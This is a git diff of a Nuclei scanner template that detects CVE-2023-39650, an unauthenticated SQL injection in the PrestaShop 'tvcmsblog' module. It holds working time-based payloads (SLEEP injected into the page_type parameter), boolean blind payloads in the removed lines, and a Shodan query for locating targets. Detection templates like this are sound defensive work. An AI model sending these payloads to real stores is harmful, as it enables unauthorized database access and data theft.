updated req. & matcher
parent
443c618c81
commit
8ed3453a2b
|
@ -1,62 +1,42 @@
|
||||||
id: CVE-2023-39650
|
id: CVE-2023-39650
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: PrestaShop Theme Volty CMS Blog SQL Injection
|
name: PrestaShop Theme Volty CMS Blog - SQL Injection
|
||||||
author: mastercho
|
author: mastercho
|
||||||
severity: critical
|
severity: critical
|
||||||
description: |
|
description: |
|
||||||
In the module “Theme Volty CMS Blog” (tvcmsblog) up to versions 4.0.1 from Theme Volty for PrestaShop, a guest can perform SQL injection in affected versions.
|
In the module 'Theme Volty CMS Blog' (tvcmsblog) up to versions 4.0.1 from Theme Volty for PrestaShop, a guest can perform SQL injection in affected versions.
|
||||||
impact: |
|
impact: |
|
||||||
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
|
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
|
||||||
reference:
|
reference:
|
||||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39650
|
|
||||||
- https://security.friendsofpresta.org/modules/2023/08/24/tvcmsblog.html
|
- https://security.friendsofpresta.org/modules/2023/08/24/tvcmsblog.html
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-39650
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
cvss-score: 9.8
|
cvss-score: 9.8
|
||||||
cve-id: CVE-2023-27847
|
cve-id: CVE-2023-39650
|
||||||
cwe-id: CWE-89
|
cwe-id: CWE-89
|
||||||
epss-score: 0.04685
|
epss-score: 0.04685
|
||||||
epss-percentile: 0.91818
|
epss-percentile: 0.91818
|
||||||
metadata:
|
metadata:
|
||||||
redirects: true
|
max-request: 1
|
||||||
max-redirects: 3
|
verified: true
|
||||||
framework: prestashop
|
framework: prestashop
|
||||||
shodan-query: http.component:"Prestashop"
|
shodan-query: html:"/tvcmsblog"
|
||||||
tags: cve,cve2023,prestashop,sqli,unauth,tvcmsblog
|
tags: cve,cve2023,prestashop,sqli,tvcmsblog
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
@timeout: 20s
|
@timeout: 20s
|
||||||
GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+(SELECT+7826+FROM+(SELECT(SLEEP(5)))oqFL)--+yxoW HTTP/1.1
|
GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+(SELECT+7826+FROM+(SELECT(SLEEP(6)))oqFL)--+yxoW HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Origin: {{BaseURL}}
|
|
||||||
|
|
||||||
- |
|
|
||||||
@timeout: 20s
|
|
||||||
GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+5484=5484--+xhCs HTTP/1.1
|
|
||||||
Host: {{Hostname}}
|
|
||||||
Origin: {{BaseURL}}
|
|
||||||
|
|
||||||
- |
|
|
||||||
@timeout: 20s
|
|
||||||
GET /module/tvcmsblog/single?SubmitCurrency=1&id=14&id_currency=2&page_type=post"+AND+5484=5485--+xhCs HTTP/1.1
|
|
||||||
Host: {{Hostname}}
|
|
||||||
Origin: {{BaseURL}}
|
|
||||||
|
|
||||||
host-redirects: true
|
host-redirects: true
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
name: time-based
|
name: time-based
|
||||||
dsl:
|
dsl:
|
||||||
- 'duration_1>=5'
|
- 'duration>=6'
|
||||||
- 'status_code_1 == 200 && contains(body_1, "tvcmsblog")'
|
- 'status_code == 200 && contains_all(tolower(response), "tvcmsblog", "prestashop")'
|
||||||
condition: and
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
name: blind-based
|
|
||||||
dsl:
|
|
||||||
- 'status_code_2 == 200 && contains(body_2, "tvcmsblog")'
|
|
||||||
- 'status_code_2 == 200 && status_code_3 == 302'
|
|
||||||
condition: and
|
condition: and
|
Loading…
Reference in New Issue